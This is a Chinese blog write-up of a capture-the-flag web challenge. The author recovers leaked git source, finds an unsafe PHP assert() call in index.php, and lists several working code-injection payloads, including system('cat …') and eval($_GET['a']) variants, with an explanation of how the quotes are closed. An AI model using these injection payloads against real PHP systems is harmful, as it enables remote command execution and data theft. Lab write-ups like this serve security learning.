直接进入场景,大概看一下,并没啥东西。
进入开发者模式,一般注释都有提示,直接搜索flag,可以看到是一个get传参。
试了一下居然是空白,真是欺负年少无知的我。
所以,百度一下,别人说是git源码泄漏,于是操作一下,果然出来了文件。
要下载文件就用到一个githack.py脚本,我的另一篇博客有写到。
GitHack下载及使用
下载下来后,发现了flag.php,然而看不到flag.
所有文件都看一遍,只有index.php中有php代码,所以研究一下。
if else语句是以get方式获得一个变量,若没有,就设为home。
接下来是将page变量拼接成templates下的php文件,并赋值给file。
接下来的两个assert()函数就是判断file中是否有… 以及file所指向的文件是否存在。
以往的传参基本都是利用可执行shell或是能执行php语句的函数来构造payload,本题也不例外,利用assert()来突破。
官网那个的解释最要紧的就是:如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。
也就是assert(“system(“ls”)”)会执行ls命令。
在index.php代码中,我们需要将想执行的代码插入assert的字符串中,并且要把前面的strpos和file_exists函数的括号补齐。
其中的die()函数:输出一条命令并退出脚本。
另一个点是or:大神描述,看完就理解为啥有时一个flag有时两个flag了
payload
1.
page=a’) or system(‘cat templates/flag.php’);//
类似语句
page=’) or system(‘cat templates/flag.php’);//
page=’,’’) or system(‘cat templates/flag.php’);//
page=aaa’,‘sss’) or system(‘cat templates/flag.php’);//
page=a’,‘s’) or print_r(file_get_contents(‘templates/flag.php’));//
这一类就是根据strpos(‘’),strpos(‘a’),strpos(‘’,’’),strpos(‘a’,‘s’)全为假来构造。
2.
page=’.system (‘cat templates/flag.php’).’
3.
page=s’) or eval($_GET[‘a’]);%23&&a=system(‘cat templates/flag.php’);
我的误区
拿第一种解法来说,我在做的时候这样写,
page=a’)") or system(‘cat templates/flag.php’);//
我想的是直接闭合assert()函数,但是后面就执行不了system()函数了(错误)
assert("strpos('a')") or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");
所以一定不能加那个"),正常的闭合语句是(一定是要把执行语句放在assert()的双引号之间,正确)。
assert("strpos('a') or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");
php要执行的语句是
strpos('a') or system('cat templates/flag.php');//', '..') === false
php语句先执行strpos(‘a’),是false,再执行system(),是true,所以,在assert() or die() 中,第一个返回true,die()函数不输出,同理,第二个assert() or die() 也不输出,因此有两个flag。
最后两种方法都比较特别,可以研究一下
cyberpeace{61cffed96fe4eedaab639e7780475828}
342
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
